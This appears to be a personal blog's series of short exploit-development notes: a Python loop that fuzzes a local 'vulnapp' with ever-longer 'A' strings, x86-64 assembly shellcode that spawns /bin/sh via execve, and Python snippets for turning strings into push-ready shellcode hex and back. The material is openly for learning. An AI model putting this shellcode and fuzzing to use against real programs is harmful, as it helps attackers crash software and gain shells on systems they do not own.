Wednesday, March 11, 2020

simplistic python fuzzing

import os

for i in range(500,1000,1):
 cmd = ("python -c \"print('A' * %d)\"" % i)
 print("fuzzing length %d" % i)
 os.system("%s | ./vulnapp" % cmd)

 this is passing AAAAA where length is 500,501,502, ... all the way to 1000
 and just looking to see when the program set faults, at which input length

Tuesday, March 10, 2020

shellcode in ASM to C program examples

not optimized for shortness
does not remove null (00) characters

using data
section .text
 global _start

 xor rdi, rdi ;null char to term string
 push rdi
 mov rdi, 0x68732f6e69622f2f ; //bin/sh
 push rdi
 mov rdi, rsp ; filename
 mov rsi, 0 ; argv
 mov rdx, 0 ;envp
 mov rax, 59 ; execve syscall

using push
section .data
 sh: db "//bin/sh"

section .text
 global _start

 mov rdi, sh ; filename
 mov rsi, 0 ; argv
 mov rdx, 0 ;envp
 mov rax, 59 ; execve syscall

to compile
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami

Convert String to Shell Code Hex in Python

if you want
to become hex you can use in assembly for shell code

>>> for word in (re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode())):
...  byte = re.findall(".{2}", word)
...  cmd = ""
...  for index in range(len(byte)-1,-1,-1):
...   cmd = cmd + byte[index]
...  print("push 0x%s" % cmd)

push 0x69622f2f
push 0x68732f6e

side notes
   binascii.hexlify converts string to binary
   re.findall(".{8}", finds the words
   re.findall(".{2}" , finds the bytes
   range(... ,... , -1) loops through the bytes in each word backwards (endianess)
   cmd = cmd + ...  rebuilds the hex in the correct order

Decode ShellCode String in Python

if you see this

push 0x68732f2f
push 0x6e69622f

it may be a string
you can use python 3 to decode and see

import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
>>> binascii.unhexlify("6e69622f").decode()[::-1]

yep! shellcode


side note:
  binascii.hexlify was used to convert the hex to a binary

  decode() was used to convert the binary to a string

  [::-1] was used to reverse the string's characters